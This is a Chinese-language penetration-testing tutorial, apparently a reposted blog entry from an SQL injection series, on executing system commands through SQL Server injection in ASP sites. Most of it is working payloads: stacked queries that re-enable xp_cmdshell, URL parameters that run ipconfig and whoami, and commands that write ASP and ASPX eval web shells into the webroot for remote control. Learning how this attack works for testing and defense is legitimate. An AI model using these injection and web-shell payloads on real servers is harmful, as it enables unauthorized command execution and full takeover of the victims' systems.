74.网络安全渗透测试—[SQL注入篇13]—[SQLSERVER+ASP-执行系统命令]
我認為,無論是學習安全還是從事安全的人,多多少少都有些許的情懷和使命感!!!
文章目錄
- 一、SQLSERVER+ASP 執行系統命令
- 1、前言
- 2、SQLSERVER+ASP 執行系統命令示例
一、SQLSERVER+ASP 執行系統命令
1、前言
(1)SQLSERVER 的多行操作:在SQLSERVER中一行是可以執行多條語句的,不同的語句之間通過分號分割開,如:select * from art; select * from admin;
(2)xp_cmdshell默認在mssql 2000中是開啟的,在mssql 2005之后的版本中則默認禁止。如果用戶擁有管理員sa權限則可以用sp_configure重新開啟它。
(3)開啟的命令:;EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
(4)四條命令解釋:
EXEC sp_configure 'show advanced options',1 //允許修改高級參數RECONFIGURE; //表示重寫配置EXEC sp_configure 'xp_cmdshell',1 //打開xp_cmdshell擴展RECONFIGURE; //表示重寫配置(5)同樣的,關閉xp_cmdshell的命令為:;EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 0;RECONFIGURE;
2、SQLSERVER+ASP 執行系統命令示例
(1)執行系統命令:?id=1;EXEC master.dbo.xp_cmdshell 'ipconfig'
(2)開啟xp_cmdshell:?id=1;EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
(3)再次執行系統命令:?id=1;EXEC master.dbo.xp_cmdshell 'ipconfig'
(4)寫入asp一句話,直接getshell: ?id=1;exec master..xp_cmdshell 'echo ^<%eval request(chr(97))%^> > C:\inetpub\wwwroot\www.demo1.com\2.asp'--
蟻劍連接:
(5)寫入aspx一句話,直接getshell: ?id=1;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["chopper"],"unsafe");%^> > C:\inetpub\wwwroot\www.demo1.com\shell2.aspx'--
蟻劍連接:
(6)執行系統命令,并且把命令結果輸出到指定文件:?id=1;EXEC master.dbo.xp_cmdshell 'ipconfig >> C:\inetpub\wwwroot\www.demo1.com\ip.txt'
訪問我們寫入的ip.txt文件:
(7)執行系統命令,并且把命令結果輸出到指定文件:?id=1;EXEC master.dbo.xp_cmdshell 'whoami >> C:\inetpub\wwwroot\www.demo1.com\ip.txt'
訪問我們寫入的ip.txt文件:
總結
以上是生活随笔為你收集整理的74.网络安全渗透测试—[SQL注入篇13]—[SQLSERVER+ASP-执行系统命令]的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 字符串匹配和KMP模式匹配(没太学懂,暂
- 下一篇: windows 删除服务_哪些Windo